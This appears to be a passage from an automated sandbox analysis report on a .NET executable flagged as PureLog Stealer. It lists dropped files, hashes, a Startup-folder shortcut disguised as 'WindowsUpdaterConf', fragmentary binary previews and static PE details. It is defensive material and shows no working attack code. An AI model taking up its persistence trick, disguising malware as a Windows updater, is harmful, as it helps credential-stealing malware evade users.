                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cl5gs13r.lo1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecrjdxmn.ewj.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfrte0cl.5qj.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcw2ohjv.izp.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htydzu2c.bn2.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikx5gxgc.sjs.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0ylz1h0.1vr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjcycw4y.as0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuxc1ff2.0ep.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oppjfl4v.lqp.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjageedg.thj.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syusxrry.wby.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wijyskfa.bci.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4bvhsvd.hsz.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 5 17:40:32 2024, mtime=Thu Dec 5 17:40:32 2024, atime=Thu Dec 5 17:40:32 2024, length=3507712, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):814
                                                                                        Entropy (8bit):5.15780255210316
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:841X4lT1+Oj6CIUlqi9Eg9jA6iwRaW+EgWawuLvqAnenG44t2YZ/elFlSJmZmV:8tlBgnUlXEEA6iwRD+EKPqIuVqyFm
                                                                                        MD5:19360AC82919CA72B1045AB755EF69A8
                                                                                        SHA1:D957BEAAAC961491963D67222F9581B5ADCAD361
                                                                                        SHA-256:A37C41366EE17EE998748B91868FDCCAC84F51FC3953B583588274AC924D6501
                                                                                        SHA-512:3E566204D27E43FAC20D5A80388EF258119034634E16C1628E2B0751A0A7ECD06B254962DA0972093C4E7F62AFD145C9EAC710C0082896A4AC10874710C472AD
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... .....!*EG....!*EG....!*EG....5.......................:..DG..Yr?.D..U..k0.&...&......vk.v......!*EG....*EG......t.".CFSF..2...5..Y.. .WINDOW~1.EXE....t.Y^...H.g.3..(.....gVA.G..k...^......Y...Y............................C...W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e...H...T...............-.......S.............c......C:\Users\user\WindowsUpdaterConf.exe..+.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.........|....I.J.H..K..:...`.......X.......549163...........hT..CrF.f4... .H.]]8....,.......hT..CrF.f4... .H.]]8....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                        C:\Users\user\AppData\Roaming\file.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3507712
                                                                                        Entropy (8bit):6.995081946176499
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:kAehczkVjrQEwCsO0FtOyjQJRch9FCXuHxcXYuQEnWSMhPYz9GSU7uu0cGVh9t0q:kAuDPy2Rpe0WVNYzMAL9htLAcbklta
                                                                                        MD5:7823E902900881094372948957825FE1
                                                                                        SHA1:297A663F3B64FB9863164D10AC698BEF03DD3A0F
                                                                                        SHA-256:92D36E5FB3FDBF10AD10C7880C40013C2E21B8A49E20720137D2B4851681233F
                                                                                        SHA-512:60D4EA35CFEC5154CFA3CB767DE7C839CA8B3987B27599EA218EC1C47F1D111A59F193CD3CFD1266AE384434AE653F1E0A297F7222A2592E529B2B4404DD6238
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg.................|5...........5.. ....5...@.. ........................5...........@...................................5.K.....5.......................5...................................................... ............... ..H............text....z5.. ...|5................. ..`.rsrc.........5......~5.............@....reloc........5.......5.............@..B..................5.....H........B..h...........p...&............................................(.M..*..0..G.............~?...(.M..&.0...&~@...(.M..~....~....~C...(.M....~D...(.M.......*............0........*....(....*..(.M..*.....*.................................#...~E...(.M.........8:............~F...(.M..9......~....a.....~G...(.M..o.......X.......i?.....~H...(.M..*.......*....(....*.6(.M.........*......*................i........8.............i].a...X....i?.....*.......*....(....*..(.M..*.....

                                                                                        C:\Users\user\AppData\Roaming\file.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Users\user\WindowsUpdaterConf.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3507712
                                                                                        Entropy (8bit):6.995081946176499
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:kAehczkVjrQEwCsO0FtOyjQJRch9FCXuHxcXYuQEnWSMhPYz9GSU7uu0cGVh9t0q:kAuDPy2Rpe0WVNYzMAL9htLAcbklta
                                                                                        MD5:7823E902900881094372948957825FE1
                                                                                        SHA1:297A663F3B64FB9863164D10AC698BEF03DD3A0F
                                                                                        SHA-256:92D36E5FB3FDBF10AD10C7880C40013C2E21B8A49E20720137D2B4851681233F
                                                                                        SHA-512:60D4EA35CFEC5154CFA3CB767DE7C839CA8B3987B27599EA218EC1C47F1D111A59F193CD3CFD1266AE384434AE653F1E0A297F7222A2592E529B2B4404DD6238
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\WindowsUpdaterConf.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg.................|5...........5.. ....5...@.. ........................5...........@...................................5.K.....5.......................5...................................................... ............... ..H............text....z5.. ...|5................. ..`.rsrc.........5......~5.............@....reloc........5.......5.............@..B..................5.....H........B..h...........p...&............................................(.M..*..0..G.............~?...(.M..&.0...&~@...(.M..~....~....~C...(.M....~D...(.M.......*............0........*....(....*..(.M..*.....*.................................#...~E...(.M.........8:............~F...(.M..9......~....a.....~G...(.M..o.......X.......i?.....~H...(.M..*.......*....(....*.6(.M.........*......*................i........8.............i].a...X....i?.....*.......*....(....*..(.M..*.....

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.465612679391392
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cIXfpi67eLPU9skLmb0b4MWSPKaJG8nAgejZMMhA2gX4WABl0uNDdwBCswSbV:hXD94MWlLZMM6YFHB+V
                                                                                        MD5:40A448533EDD58F024831DAB7D6C1727
                                                                                        SHA1:0543C67282582B9A449EBD12A367EECB83E96EB8
                                                                                        SHA-256:9D61EE7E010C05DD48D6FF148AFB49B09B4F58833F4DF4F0AB0F5BB673DE5640
                                                                                        SHA-512:27B1F993F3D620A499070B8D99EF0A9F83834E1947CA40C5B87C51AD81B2A978F5844ABFC15A11219D55273F667F26A5F11E597C03A11FC9508FFB6AE1C73730
                                                                                        Malicious:false
                                                                                        Preview:regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..H.EG..............................................................................................................................................................................................................................................................................................................................................m:_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):6.995081946176499
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:file.exe
                                                                                        File size:3'507'712 bytes
                                                                                        MD5:7823e902900881094372948957825fe1
                                                                                        SHA1:297a663f3b64fb9863164d10ac698bef03dd3a0f
                                                                                        SHA256:92d36e5fb3fdbf10ad10c7880c40013c2e21b8a49e20720137d2b4851681233f
                                                                                        SHA512:60d4ea35cfec5154cfa3cb767de7c839ca8b3987b27599ea218ec1c47f1d111a59f193cd3cfd1266ae384434ae653f1e0a297f7222a2592e529b2b4404dd6238
                                                                                        SSDEEP:24576:kAehczkVjrQEwCsO0FtOyjQJRch9FCXuHxcXYuQEnWSMhPYz9GSU7uu0cGVh9t0q:kAuDPy2Rpe0WVNYzMAL9htLAcbklta
                                                                                        TLSH:35F552C2C1E04AA1DBA01D7A5B6AD3591AD60767CA56E351C73F12F31F22F3C21B81E6
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg.................|5...........5.. ....5...@.. ........................5...........@................................

                                                                                        File Icon

                                                                                        Icon Hash:90cececece8e8eb0

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x7599fe
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6751EED8 [Thu Dec 5 18:20:08 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3599b00x4b.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x35a0000x4f0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x35c0000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
